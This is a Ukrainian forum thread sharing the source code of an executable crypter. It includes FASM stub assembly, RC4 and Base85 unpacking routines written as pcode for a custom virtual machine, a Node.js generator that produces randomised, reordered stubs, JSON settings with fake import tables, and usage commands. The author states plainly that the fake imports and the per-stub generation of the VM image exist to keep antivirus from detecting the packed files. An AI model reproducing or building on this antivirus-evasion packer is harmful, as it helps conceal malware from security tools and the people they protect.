  push  PICOVM_FNC_DSPUSH
  pop   eax
  push  DWord [pvmctx]
  pop   ebx
  call  [ppicovm]
  push  DWord [cdcrsize]
  pop   edx
  push  PICOVM_FNC_DSPUSH
  pop   eax
  mov   ebx, DWord [pvmctx]
  call  [ppicovm]
  push  PICOVM_FNC_DSPUSH
  pop   eax
  mov   edx, DWord [pUnpackedData]
  mov   ebx, DWord [pvmctx]
  call  [ppicovm]
  mov   edx, DWord [palphabet]
  mov   ebx, DWord [pvmctx]
  push  PICOVM_FNC_DSPUSH
  pop   eax
  call  [ppicovm]
  mov   edx, DWord [pPackedData]
  push  DWord [pvmctx]
  pop   ebx
  push  PICOVM_FNC_DSPUSH
  pop   eax
  call  [ppicovm]
  push  PICOVM_FNC_RUN
  pop   eax
  push  DWord [ppcode]
  pop   edx
  call  [ppicovm]
  mov   edx, DWord [ppcode]
  mov   esi, DWord [pUnpackedData]
  call  esi
  pop   eax
  pop   ebx
  pop   ecx
  pop   edx
  pop   esi
  mov   eax, DWord [iResult]
  ret
endp

passbody:
 db 'Mq*hG$bm)iK%59a8', 0h

alphbody db \
0xB, 0xE, 0x21, 0x9, 0x39, 0x32, 0x2A, 0x13, 0x4B, 0x33, 0x2, 0x6, 0x22, 0x46, 0x25, 0x3F, \
0x10, 0x20, 0x1E, 0xC, 0x49, 0x17, 0xA, 0x45, 0x26, 0x28, 0x0, 0x16, 0x34, 0x2B, 0x2C, 0x35, \
0x4E, 0x1A, 0x15, 0x5, 0x4D, 0x42, 0x44, 0x2D, 0xF, 0x41, 0x4, 0x4A, 0x1, 0x50, 0x3D, 0xD, \
0x3B, 0x7, 0x3A, 0x3C, 0x14, 0x1B, 0x37, 0x4F, 0x48, 0x29, 0x8, 0x31, 0x24, 0x36, 0x47, 0x19, \
0x43, 0x27, 0x23, 0x51, 0x3, 0x1F, 0x18, 0x2E, 0x1D, 0x2F, 0x11, 0x54, 0x53, 0x3E, 0x52, 0x4C, \
0x30, 0x12, 0x40, 0x1C, 0x38

Файл, що містить властивості стабу в JSON форматі.

Одчинити
{"pass":{"place":3,"val":"Mq*hG$bm)iK%59a8"},"vm":{"place":1,"dstacksize":45,"rstacksize":24,"order":["ctx","vmbody","dstack","rstack"],"vmbodysize":999},"datapeimage":{"place":2,"resnum":0},"alphabet":{"place":3,"val":[11,14,33,9,57,50,42,19,75,51,2,6,34,70,37,63,16,32,30,12,73,23,10,69,38,40,0,22,52,43,44,53,78,26,21,5,77,66,68,45,15,65,4,74,1,80,61,13,59,7,58,60,20,27,55,79,72,41,8,49,36,54,71,25,67,39,35,81,3,31,24,46,29,47,17,84,83,62,82,76,48,18,64,28,56]},"pcode":{"place":2},"loadpe":{"requmem":4672,"depth":120,"offset":5969},"import":{"fncs":["GetStdHandle","VirtualAlloc","WriteFile","GetDC","BeginPaint","CreateMutexA","CreateMutexW","VirtualFree","GetLastError","GetModuleHandleA","GetModuleHandleW","GetSystemInfo","GetVersionExA","LocalAlloc","CharUpperA","CreateDialogParamA","CreateWindowExA","DefWindowProcA","DispatchMessageA","EndDialog","EndPaint","GetClassInfoExA","GetMessageA","GetSystemMetrics","LoadCursorA","LoadIconA","PostQuitMessage","RegisterClassExA","SendMessageA","SendMessageW","SetDlgItemInt","SetFocus","SetWindowTextW","ShowWindow","TranslateMessage","UpdateWindow","GetDIBits","CreateCompatibleBitmap","GdiFlush","CombineRgn","CreateRectRgnIndirect","GetRegionData","SetStretchBltMode","SelectObject","CreateCompatibleDC","CreateDIBitmap","BitBlt","SetBkMode","CreateFontIndirectA","DPtoLP","GetDeviceCaps","CreateFontA","StretchBlt","GetObjectA","SelectClipRgn","ExtTextOutA"]},"icon":{"resnum":789},"stackdepth":336,"datatime":1401827612838}

Деякі параметри там не нужні, а деякі нужні, но не там :D, тож мій код нічим не гірше Microsoft`івського коду :) Документуватиму так само - ті поля, про які я не скажу вважайте "зарезервованими" :D
"import.fncs": тут знаходяться дані про фейковий імпорт (а імпорт майже увесь фейковий, бо єдине що використовує стаб - це функція VirtualAlloc), який потрібний аби антивірус не казився.

Файл pcode.asm - алгоритми кодування і шифрування виконані в пікоді для програмної віртуальної машини (далі - ВМ). На рівні мови асемблера для ВМ обфускації майже нема, окрім обрання випадкової мнемоніки (з можливих варіантів і наявних мнемонік) для завантаження константи в стек.

Одчинити
format binary
use32

include '%FASMINC%/win32a.inc'
include 'picovm.inc'

macro @ cmd, p {
 PICOVM_CMD cmd, p
}

__Start__:
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd]
  @ _LOADCD, 0x3
  @ _PICK
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd, crcdsize]
  @ _LOADCB, 0x3
  @ _PICK
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd, crcdsize, pdst]
  @ _SWAP
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd, pdst, crcdsize]
  @ _LOADCD, BASE85-.toBase85
.toBase85:
  @ _CALLR
; [pS, ppass, crcdsize, pdst]
;  @ _HLT
  @ _SWAP
; [pS, ppass, pdst, crcdsize]
  @ _LOADCD, 0x5
  @ _DIV
  @ _LOADCW, 0x4
  @ _MUL
; [pS, lpKey, lpBuf, dwBufLen]
  @ _ROT
  @ _SWAP
; [pS, lpBuf, lpKey, dwBufLen]
  @ _LOADCW, 0x10
; [pS, lpBuf, lpKey, dwBufLen, dwKeyLen]
  @ _LOADCB, 0x4
  @ _ROLL
; [lpBuf, lpKey, dwBufLen, dwKeyLen, pS]
  @ _LOADCD, RC4-@F
@@:
  @ _CALLR
  @ _HLT

; [lpBuf, lpKey, dwBufLen, dwKeyLen, pS]
RC4:
@ _LOADCB, 0 ;B
@ _DUP ;A
@ _ROT
@ _SWAP
.for1_up:
@ _DUP
@ _LOADCW, 0x100;
@ _EQ
@ _NOT
@ _LOADCD, .for1_down-.tofor1_down
.tofor1_down:
@ _JMPC
@ _OVER
@ _OVER
@ _ADD
@ _OVER
@ _SWAP
@ _STOREB
@ _LOADCB, 0x1              
@ _ADD
@ _LOADCD, .for1_up-.tofor1_up
.tofor1_up:
@ _JMPR
.for1_down:
@ _DROP
@ _LOADCB, 0x0
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0]
.for2_up:
@ _DUP
@ _LOADCW, 0x100
@ _EQ
@ _NOT
@ _LOADCD, .for2_down-.tofor2_down
.tofor2_down:
@ _JMPC
@ _OVER
@ _OVER
@ _ADD
@ _FETCHB
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]]
@ _LOADCB, 0x3
@ _PICK
@ _ADD 
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]+B]
@ _OVER
@ _LOADCB, 0x5
@ _PICK
@ _MOD
@ _LOADCB, 0x7
@ _PICK
@ _ADD
@ _FETCHB
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]+B, lpKey [A % dwKeyLen]]
@ _ADD
@ _LOADCB, 0xFF
@ _AND
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]+B+lpKey [A % dwKeyLen]]
@ _LOADCB, 0x3
@ _ROLL
@ _DROP
;[lpBuf, lpKey, dwBufLen, dwKeyLen, pS, A, B]
@ _ROT
;[lpBuf, lpKey, dwBufLen, dwKeyLen, A, B, pS]
@ _ROT
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A]
@ _OVER
@ _OVER
@ _ADD
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A, pS+A]
@ _LOADCB, 0x2
@ _PICK
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A, pS+A, pS]
@ _LOADCB, 0x4
@ _PICK
@ _ADD
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A, pS+A, pS+B]
@ _OVER
@ _FETCHB
@ _OVER
@ _FETCHB
@ _SWAP
@ _ROT
@ _STOREB
@ _SWAP
@ _STOREB
@ _LOADCB, 0x1
@ _ADD
@ _LOADCD, .for2_up-.tofor2_up
.tofor2_up:
@ _JMPR
.for2_down:
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A]
@ _ROT
;[lpBuf, lpKey, dwBufLen, dwKeyLen, pS, A, B]
@ _LOADCB, 0x3
@ _ROLL
@ _DROP
;[lpBuf, lpKey, dwBufLen, pS, A, B]
@ _LOADCB, 0x4
@ _ROLL
@ _DROP
@ _SWAP
;[lpBuf, dwBufLen, pS, B, A]
.for3_up:
@ _LOADCB, 0x3
@ _ROLL
@ _DUP
;[lpBuf, pS, B, A, dwBufLen, dwBufLen]
@ _LOADCD, .for3_down-.tofor3_down
.tofor3_down:
@ _JMPC
@ _LOADCB, 0x1
@ _SUB
;[lpBuf, pS, B, A, dwBufLen]
@ _SWAP
@ _LOADCB, 0x1
@ _ADD
@ _LOADCB, 0xFF
@ _AND
;[lpBuf, pS, A, dwBufLen, (A+1)%255]
@ _ROT
;[lpBuf, pS, dwBufLen, (A+1)%255, B]
@ _OVER
@ _LOADCB, 0x4
@ _PICK
@ _ADD
@ _FETCHB
@ _ADD
@ _LOADCB, 0xFF
@ _AND
@ _OVER
@ _OVER
@ _LOADCB, 0x5
@ _PICK
@ _ADD
@ _SWAP
@ _LOADCB, 0x5
@ _PICK
@ _ADD
@ _OVER
@ _OVER
;
@ _OVER
@ _FETCHB
@ _OVER
@ _FETCHB
@ _SWAP
@ _ROT
@ _STOREB
@ _SWAP
@ _STOREB
;
@ _FETCHB
@ _SWAP
@ _FETCHB
@ _ADD
@ _LOADCB, 0xFF
@ _AND
@ _LOADCB, 0x4
@ _PICK
@ _ADD
@ _FETCHB
@ _LOADCB, 0x5
@ _PICK
@ _FETCHB
@ _XOR
@ _LOADCB, 0x5
@ _PICK
@ _STOREB
@ _LOADCB, 0x4
@ _ROLL
@ _LOADCB, 0x1
@ _ADD
@ _ROT
@ _ROT
@ _LOADCB, 0x4
@ _ROLL
@ _LOADCB, 0x4
@ _ROLL
@ _LOADCB, 0x3
@ _ROLL
@ _LOADCB, 0x3
@ _ROLL
@ _LOADCB, 0x3
@ _ROLL
@ _ROT
@ _ROT
@ _SWAP
@ _LOADCD, .for3_up-.tofor3_up
.tofor3_up:
@ _JMPR
.for3_down:
@ _DROP
@ _DROP
@ _DROP
@ _DROP
@ _DROP
@ _RET

;[pAlphabet, pSrc] => [pSrc, DW]
DECODE_DWORD:
@ _LOADCB, 0
@ _OVER
@ _FETCHB
;[pAlphabet, pSrc, 0, [pSrc]]
@ _LOADCW, 0x3
@ _PICK
@ _SWAP
;[pAlphabet, pSrc, 0, Alphabet, [pSrc]]
@ _LOADCD, SEARCHB -.toSearchB1
.toSearchB1:
@ _CALLR
@ _ADD
@ _SWAP
@ _LOADCW, 0x1
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
@ _LOADCD, 0x3
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB2
.toSearchB2:
@ _CALLR
@ _LOADCB, 0x55
@ _MUL
@ _ADD
@ _SWAP
@ _LOADCB, 0x1
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
@ _LOADCD, 0x3
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB3
.toSearchB3:
@ _CALLR
@ _LOADCW, 85*85
@ _MUL
@ _ADD
@ _SWAP
@ _LOADCB, 0x1
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
@ _LOADCD, 0x3
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB4
.toSearchB4:
@ _CALLR
@ _LOADCD, 85*85*85
@ _MUL
@ _ADD
@ _SWAP
@ _LOADCW, 0x1
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
@ _LOADCW, 0x3
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB5
.toSearchB5:
@ _CALLR
@ _LOADCD, 85*85*85*85
@ _MUL
@ _ADD
@ _ROT
@ _DROP
@ _SWAP
@ _LOADCD, 0x1
@ _ADD
@ _SWAP
@ _RET

SEARCHB:
@ _OVER
@ _SWAP
.Up:
@ _OVER
@ _FETCHB
@ _OVER
;[pMem, pMem, bVal, [pMem], bVal]
@ _EQ
;[pMem, pMem, bVal, BOOL]
@ _NOT
@ _LOADCD, .Down-.toDown
.toDown:
@ _JMPC
@ _SWAP
@ _LOADCB, 0x1
@ _ADD
@ _SWAP
@ _LOADCD, .Up-.toUp
.toUp:
@ _JMPR
.Down:
@ _DROP
@ _SWAP
@ _SUB
@ _RET

; BASE85
;[pAlphabet, pSrc, pDst, Size]
BASE85:
@ _DUP
@ _LOADCW, 0x0
@ _EQ
@ _NOT
@ _LOADCD, .Down-.toDown
.toDown:
@ _JMPC
@ _LOADCB, 0x5
@ _SUB
@ _ROT
;[pAlphabet, pDst, Size, pSrc]
@ _LOADCW, 0x3
@ _PICK
;[pAlphabet, pDst, Size, pSrc, pAlphabet]
@ _SWAP
;[pAlphabet, pDst, Size, pAlphabet, pSrc]
@ _LOADCD, DECODE_DWORD-.toDecodeDWord
.toDecodeDWord:
@ _CALLR
;[pAlphabet, pDst, Size, pSrc, DW]
@ _LOADCW, 0x3
@ _PICK
;[pAlphabet, pDst, Size, pSrc, DW, pDst]
@ _STORED
;[pAlphabet, pDst, Size, pSrc]
@ _ROT
;[pAlphabet, Size, pSrc, pDst]
@ _LOADCD, 0x4
@ _ADD
@ _ROT
;[pAlphabet, pSrc, pDst, Size]
@ _LOADCD, BASE85-.toUp
.toUp:
@ _JMPR
.Down:
@ _DROP
@ _DROP
@ _DROP
@ _DROP
@ _RET

Також директорія стабу містить файли віртуальної машини: picovm.bin - шеллкод віртуальної машини, picovm.inc - заголовковий файл віртуальної машини, який необхідний також для компіляції програм для ВМ в пікод, entry.obj - "перехідник", що одержує керування від функції main і передає його до головної функції нашого стабу. Докладніше про ВМ ви можете ознайомитися тут. Варто зазначити, що шеллкод ВМ ніде не лежить у незмінному вигляді, бо його одразу ж задетектить антивірус і внесе до своєї бази сигнатур. Замість цього,  за створення образу ВМ в пам’яті відповідає функція genvmimage, яка "випадковим" чином генерується і унікальна для кажного стабу.

Долучені файли
В файлі  STUBS.EXAMPLE.zip містяться стаби, за допомогою яких пакуються файли.

Post's attachments

STUBS.EXAMPLE.zip 89.22 kb, 850 downloads since 2015-01-02 

Подякували: leofun011

3

Re: [Джерельний код] Криптор

Керівництво з використання криптора

Для пакування файлів за допомогою криптора, останній потрібно запустити з наступними параметрами:

ENCRYPT.CMD вхідний_виконуваний_файл вихідний_виконуваний_файл стабова_тека необов’язковий_параметер

Приклад використання:

ENCRYPT.CMD E:\SAMPLES\CALC.exe E:\CALC.E3.EXE E:\STUBS\E3 "PLUGINS?RESTORESEH|ICON?E:\SETUP.ICO"

Долучені файли
samples.executable.zip містить:

 • hello.exe - мініатюрний виконуваний файл (розміром півтора кілобайта), який показує спливне вікно

 • calc.exe - калькулятор для Winows XP

 • hello.crypted.*.exe - криптований hello.exe різними стабами

 • calc.crypted.*.exe - криптований calc.exe різними стабами

Post's attachments

samples.executable.zip 706.27 kb, 752 downloads since 2015-01-02 

Подякували: leofun011

4

Re: [Джерельний код] Криптор

Генератор стабів

Для того щоб створити новий стаб, запустіть CREATESTUB.CMD з наступними параметрами:

CREATESTUB.CMD SETTINGS.JSON STUBDIR

Файл settings.json використовується генератором стабів для задання параметів пакування. Його розширена версія зберігається в стабовій теці.

Одчинити
{
  "pass": {
    "place": 2,
    "val": "AjIx@pHJ[*U3M&eVjk9"
  },
  "vm": {
    "place": 1,
    "dstacksize": 56,
    "rstacksize": 63,
    "order": ["rstack", "dstack", "vmbody", "ctx"],
    "vmbodysize": 1024
  },
  "datapeimage": {
    "place": 2,
    "resnum": 0
  },
  "alphabet": {
    "place": 3,
    "val": [9, 39, 74, 67, 69, 62, 84, 38, 78, 37, 82, 19, 5, 71, 63, 23, 30, 33, 66, 44, 72, 80, 26, 46, 15, 25, 52, 24, 70, 22, 29, 34, 36, 50, 47, 6, 42, 35, 51, 59, 68, 45, 83, 55, 60, 12, 21, 41, 8, 54, 43, 77, 40, 73, 18, 48, 65, 3, 32, 11, 49, 75, 61, 14, 58, 31, 20, 16, 4, 57, 17, 7, 1, 13, 27, 2, 53, 76, 10, 64, 56, 79, 0, 28, 81]
  },
  "pcode": {
    "place": 3
  },
  "loadpe": {
    "requmem": 4672,
    "depth": 120,
    "offset": 6194
  },
  "import": {
    "fncs": ["GetStdHandle", "VirtualAlloc", "WriteFile", "Beep", "GetDC", "BeginPaint", "CreateMutexA", "CreateMutexW", "VirtualFree", "GetLastError", "GetModuleHandleA", "GetModuleHandleW", "GetSystemInfo", "GetVersionExA", "LocalAlloc", "CharUpperA", "CreateDialogParamA", "CreateWindowExA", "DefWindowProcA", "DispatchMessageA", "EndDialog", "EndPaint", "FindWindowA", "FindWindowW", "GetClassInfoExA", "GetMessageA", "GetSystemMetrics", "GetTopWindow", "LoadIconA", "PostQuitMessage", "RegisterClassExA", "RegisterWindowMessageA", "SendMessageA", "SetDlgItemInt", "SetFocus", "ShowWindow", "TranslateMessage", "UpdateWindow", "GetDIBits", "CreateCompatibleBitmap", "GdiFlush"]
  },
  "icon": {
    "resnum": 127
  }
}

файл createStub.js є головним файлом генератора стабів:

Одчинити
var fs = require('fs');
var _ = require('underscore');
var gd = require('./gendata.js');
var p = require('./platform.js');
var stt = require('./settings.js');

var tableAPI = {
 'GetStdHandle':1,
 'VirtualAlloc':4,
 'WriteFile':5,
 'Beep':2,
 'GetDC':1,
 'BeginPaint':2,
 'CreateMutexA':3,
 'CreateMutexW':3,
 'VirtualFree':3,
 'GetLastError':0,
 'GetModuleHandleA':1,
 'GetModuleHandleW':1, 
 'GetSystemInfo':1,
 'GetVersionExA':1,
 'GetVersionExW':1,
 'LocalAlloc':2,
 'CharUpperA':1,
 'CharUpperW':1, 
 'CreateDialogParamA':5,
 'CreateWindowExA':12,
 'CreateWindowExW':12,
 'DefWindowProcA':4,
 'DefWindowProcW':4, 
 'DispatchMessageA':1,
 'DispatchMessageW':1,
 'EndDialog':2,
 'EndPaint':2, 
 'FindWindowA':2, 
 'FindWindowW':2, 
 'GetClassInfoExA':3,  
 'GetClassInfoExW':3,  
 'GetMessageA':4,    
 'GetMessageW':4,   
 'GetSystemMetrics':1,
 'GetTopWindow':1,
 'LoadCursorA':2,
 'LoadCursorW':2,
 'LoadIconA':2,
 'LoadIconW':2,
 'PostQuitMessage':1,
 'RegisterClassExA':1,
 'RegisterClassExW':1,
 'RegisterWindowMessageA':1,
 'RegisterWindowMessageW':1,
 'SendMessageA':4,
 'SendMessageW':4,
 'SetDlgItemInt':4,
 'SetFocus':1,
 'SetWindowTextA':2,
 'SetWindowTextW':2,
 'ShowWindow':2,
 'TranslateMessage':1,
 'UpdateWindow':1,
 'GetDIBits':7,
 'CreateCompatibleBitmap':3,
 'RealizePalette':1,
 'SelectPalette':3,
 'CreatePalette':1,
 'GetSystemPaletteEntries':4,
 'GdiFlush':0,
 'CombineRgn':4,
 'CreateRectRgnIndirect':1,
 'GetRegionData':3,
 'SetStretchBltMode':2,
 'SelectObject':2,
 'CreateCompatibleDC':1,
 'CreateDIBitmap':6,
 'BitBlt':9,
 'SetBkMode':2,
 'CreateFontIndirectA':1,
 'DPtoLP':3, 
 'GetDeviceCaps':2,
 'CreateFontA':14,  
 'StretchBlt':11,
 'GetObjectA':3, 
 'GetObjectW':3, 
 'SelectClipRgn':2,
 'ExtTextOutA':8}

stt.readSettings(process.argv[2]+'\\settings.json');

var extern = 'extrn crdata\n';

extern += _.map(stt.settings.import.fncs, function(a) {
 return ("extrn '__imp__"+a+"@"+(tableAPI[a]*4).toString()+"' as "+a+":DWord");
}, this).join('\n');
 
Number.prototype.toHex = function() {
 return('0x'+this.toString(16).toUpperCase());
};
  
var PICOVM_CONTEXT_SIZE = 0x16;
var PICOVM_DATA_SIZE = (stt.settings.vm.rstacksize+stt.settings.vm.dstacksize)*0x4+PICOVM_CONTEXT_SIZE+stt.settings.vm.vmbodysize;

var strucvmdata = 'struct PICOVM_DATA\n' + _.map(stt.settings.vm.order, function(x) {
  return((x==='ctx')?'context PICOVM_CONTEXT ?':((x==='rstack')?'rstack dd '+stt.settings.vm.rstacksize.toHex()+' dup (?)':((x==='dstack')?'dstack dd '+stt.settings.vm.dstacksize.toHex()+' dup (?)':'picovm db '+stt.settings.vm.vmbodysize.toHex()+' dup (?)')));
 }).join('\n')+'\nends\n';
 
var offsetLoadPE = stt.settings.loadpe.requmem + PICOVM_DATA_SIZE ;
var STUB_STACK_SIZE;
var alphB85asm = 'alphbody db '+_.map(stt.settings.alphabet.val, function (x, y) {return((y%0x10?'':'\\\n')+x.toHex());}).join(', ')+'\n';
var arrDataSect = [];
var arrCodeSect = [];

var buffvm = fs.readFileSync(process.argv[2]+'\\picovm.bin');
var buffpcode = fs.readFileSync(process.argv[2]+'\\pcode.bin');
var ee = new p.ExecutionEnvironment('CryptMain', 'stdcall', []);

ee.vars.add('ppcode', 0x4);
ee.vars.add('ppass', 0x4);
ee.vars.add('ppicovm', 0x4);
ee.vars.add('pmem', 0x4);
ee.vars.add('pUnpackedData', 0x4);
ee.vars.add('S', 0x100);
ee.vars.add('pS', 0x4);
ee.vars.add('pPackedData', 0x4);
ee.vars.add('cdcrsize', 0x4);
ee.vars.add('pefilesize', 0x4);
ee.vars.add('pvmctx', 0x4);
ee.vars.add('palphabet', 0x4);
ee.vars.add('inpfsz', 0x4);

var head = 'format MS COFF\n\
use32\n\
include \'%FASMINC%\\win32a.inc\'\n\
include \'picovm.inc\'\n\n\
macro @ cmd, p {\n\
 PICOVM_CMD cmd, p\n}\n';

var codesect='section \'.text\' code readable executable\n\n';
arrCodeSect.push('proc genvmimage, pPicoVMImage\n'+ gd(buffvm, 'pPicoVMImage')+'  ret\nendp\n');

var datasect = 'section \'.data\' data readable writeable\n\n';

switch (stt.settings.pcode.place) {
 case stt.DATAPLACE_DATASECT:
  arrDataSect.push('pcode:\nfile \'pcode.bin\'\n'); 
  break;
 case stt.DATAPLACE_CODESECT:
  arrCodeSect.push('pcode:\nfile \'pcode.bin\'\n');
  break;
 case DATAPLACE_GENERATE:
  ee.vars.add('pcode', buffpcode.length); 
  break;
};
  
switch (stt.settings.pass.place) {
 case stt.DATAPLACE_GENERATE:
  var buffpass = new Buffer(stt.settings.pass.val + '\0');
  ee.vars.add('passbody', buffpass.length); 
  break;
 case stt.DATAPLACE_DATASECT:
  arrDataSect.push('passbody:\n db \''+stt.settings.pass.val+'\', 0h\n'); 
  break;
 case stt.DATAPLACE_CODESECT:
  arrCodeSect.push('passbody:\n db \''+stt.settings.pass.val+'\', 0h\n');
  break; 
};

switch (stt.settings.alphabet.place) {
 case stt.DATAPLACE_GENERATE:
  var buffalph = new Buffer(stt.settings.alphabet.val);
  ee.vars.add('alphbody', buffalph.length); 
  break;
 case stt.DATAPLACE_DATASECT:
  arrDataSect.push(alphB85asm); 
  break;
 case stt.DATAPLACE_CODESECT:
  arrCodeSect.push(alphB85asm);
  break; 
};

var i = 4;
                      
while(true) {
 var z = _.shuffle(_.range(0xE));
 if ((z.indexOf(0)>z.indexOf(5))||(z.indexOf(0)>z.indexOf(6))||(z.indexOf(0)>z.indexOf(9))||(z.indexOf(0)>z.indexOf(7))) continue;
 _.each(z, function(x, y) {
  switch(x) {
   case 0:
    ee.emit(['stdcall', 'DWord [VirtualAlloc]', 'NULL', '0xACADBE71', 'MEM_TOP_DOWN or MEM_COMMIT or MEM_RESERVE', 'PAGE_EXECUTE_READWRITE']);
    ee.cmd('load_r32$m32', [p.REG_EAX, 'pmem']);
    break;
   case 1:
    ee.emit((stt.settings.pcode.place===stt.DATAPLACE_GENERATE)?gd(buffpcode, 'pcode', true):'');
    break;
   case 2:
    var rlea = ee.getFreeReg(p.LOCK_REG);
    ee.emit(['lea', rlea.s, '[pcode]']);
    ee.cmd('load_r32$m32', [rlea.i, 'ppcode']);
    rlea.o.unlock();
    break;
   case 3:
    ee.emit((stt.settings.pass.place===stt.DATAPLACE_GENERATE)?gd(buffpass, 'passbody', true):'');
    break;
   case 4:
    var rlea = ee.getFreeReg(p.LOCK_REG);
    ee.emit(['lea', rlea.s, '[passbody]']);
    ee.cmd('load_r32$m32', [rlea.i, 'ppass']);
    rlea.o.unlock();
    break;
   case 5:
    var rlea = ee.getFreeReg(p.LOCK_REG);
    if (stt.settings.vm.place === 1) {
     ee.cmd('load_m32$r32', ['pmem', rlea.i]);
     ee.emit(['lea', rlea.s, '[PICOVM_DATA.picovm+'+rlea.s+']']);
     ee.cmd('load_r32$m32', [rlea.i, 'ppicovm']);
    } else if (stt.settings.vm.place === 3) {
     ee.emit(['lea', rlea.s, '[vmbody]']);
     arrCodeSect.push("vmbody:\nfile '..\\picovm\\picovm.bin'\n"); 
    };
    if (_.random(1)){
     ee.emit(['stdcall', 'genvmimage', '[ppicovm]']);
    } else {
     ee.cmd('load_r32$m32', [rlea.i, 'ppicovm']);
     ee.emit(['stdcall', 'genvmimage', rlea.s]);
    }
    rlea.o.unlock();
    break;
   case 6:
    fillvmstruct(ee);
    break;
   case 7:
    var rlea = ee.getFreeReg(p.LOCK_REG);
    ee.cmd('load_m32$r32', ['pmem', rlea.i]);
    if (_.random(1)) {
     ee.emit(['lea', rlea.s, '['+rlea.s+'+PICOVM_DATA.context]']); }
    else {
     ee.emit(['add', rlea.s, 'PICOVM_DATA.context']); }
    ee.cmd('load_r32$m32', [rlea.i, 'pvmctx']);
    rlea.o.unlock();
    break;
   case 8:
    ee.emit(['lea', 'eax', '[crdata]']);
    ee.cmd('load_r32$m32', [p.REG_EAX, 'pPackedData']);
    break;
   case 9:
    var rlea = ee.getFreeReg(p.LOCK_REG); 
    ee.cmd('load_m32$r32', ['pmem', rlea.i]);
    ee.cmd('add_c32$r32', [offsetLoadPE, rlea.i]);
    ee.cmd('load_r32$m32', [rlea.i, 'pUnpackedData']);
    rlea.o.unlock();
    break;
   case 10:
    var rlea = ee.getFreeReg(p.LOCK_REG); 
    ee.emit(['lea', rlea.s, '[alphbody]']);
    ee.cmd('load_r32$m32', [rlea.i, 'palphabet']);
    rlea.o.unlock();
    break;
   case 11:
    ee.cmd('load_c32$m32', [0xAB7E6CA9, 'cdcrsize']);
    break;
   case 12:
    var rlea = ee.getFreeReg(p.LOCK_REG);
    ee.emit(['lea', rlea.s, '[s]']);
    ee.cmd('load_r32$m32', [rlea.i, 'pS']);
    rlea.o.unlock();
    break;
   case 13:
    ee.emit(gd(buffpass, 'alphbody', true));
    break;
 }; }, this);
 break;};
 _.each(['pS', 'ppass', 'cdcrsize', 'pUnpackedData', 'palphabet', 'pPackedData'], function (x) {
   eval(_.shuffle(["ee.cmd('load_c32$r32', ['PICOVM_FNC_DSPUSH', p.REG_EAX]);",
    "ee.cmd('load_m32$r32', [x, p.REG_EDX]);",
    "ee.cmd('load_m32$r32', ['pvmctx', p.REG_EBX]);"]).join('\n')); 
   ee.emit(['call', '[ppicovm]']);
  }, this);
 ee.cmd('load_c32$r32', ['PICOVM_FNC_RUN', p.REG_EAX]);
 ee.cmd('load_m32$r32', ['ppcode', p.REG_EDX]);
 ee.emit(['call', '[ppicovm]']);
 ee.cmd('load_m32$r32', ['ppcode', p.REG_EDX]);
 var rshc = ee.getFreeReg();
 ee.cmd('load_m32$r32', ['pUnpackedData', rshc.i]);
 ee.emit(['call', rshc.s]);

function random_load_c8$m8(e, c8, m8) {
  var r = _.random(1), rg;
  if (r) {
    rg = e.getFreeReg(p.LOCK_REG|p.USE_ONLY_GENERAL_REGS);
    e.cmd('load_c32$r32', [c8, rg.i]);
    e.emit(['mov', 'BYTE ['+m8+']', rg.o.name[3]]);
    rg.o.unlock();
  } else {
    e.emit(['mov', 'BYTE ['+m8+']', c8.toHex()]);
  }
}

function fillvmstruct(e) {
 var rData = e.getFreeReg(p.LOCK_REG);
 var rDStack = e.getFreeReg(p.LOCK_REG);
 var rRStack = e.getFreeReg(p.LOCK_REG);
 e.cmd('load_m32$r32', ['pmem', rData.i]);
 while (true) {
  var z = _.shuffle(_.range(8));
  if ((z.indexOf(0)>z.indexOf(2))||(z.indexOf(0)>z.indexOf(4))||(z.indexOf(1)>z.indexOf(3))||(z.indexOf(1)>z.indexOf(5))) continue;
  _.each(z, function(x) {
   switch(x) {
    case 0: e.emit(['lea', rDStack.s, '['+rData.s+'+PICOVM_DATA.dstack]']); break;
    case 1: e.emit(['lea', rRStack.s, '['+rData.s+'+PICOVM_DATA.rstack]']); break;
    case 2: e.cmd('load_r32$m32', [rDStack.i, rData.s+'+PICOVM_DATA.context._dstack_top']); break;
    case 3: e.cmd('load_r32$m32', [rRStack.i, rData.s+'+PICOVM_DATA.context._rstack_top']); break;
    case 4: e.cmd('load_r32$m32', [rDStack.i, rData.s+'+PICOVM_DATA.context._dstack_begin']); break;
    case 5: e.cmd('load_r32$m32', [rRStack.i, rData.s+'+PICOVM_DATA.context._rstack_begin']); break;
    case 6: random_load_c8$m8(e, stt.settings.vm.dstacksize, rData.s+'+PICOVM_DATA.context._dstack_size'); break; 
    case 7: random_load_c8$m8(e, stt.settings.vm.rstacksize, rData.s+'+PICOVM_DATA.context._rstack_size'); break;
   }
  }, this);
  rData.o.unlock();
  rDStack.o.unlock();
  rRStack.o.unlock();
  break;
 };
}

ee.finalize();
DEPTH_RUNTIME_LIB = 0x88;
arrCodeSect.push('public CryptMain as \'_CryptMain@0\'\n\n'+ee.code);
var stubSrcCode = head+'\n'+extern+'\n'+strucvmdata+'\n'+datasect+_.shuffle(arrDataSect).join('\n')+'\n'+codesect+_.shuffle(arrCodeSect).join('\n');
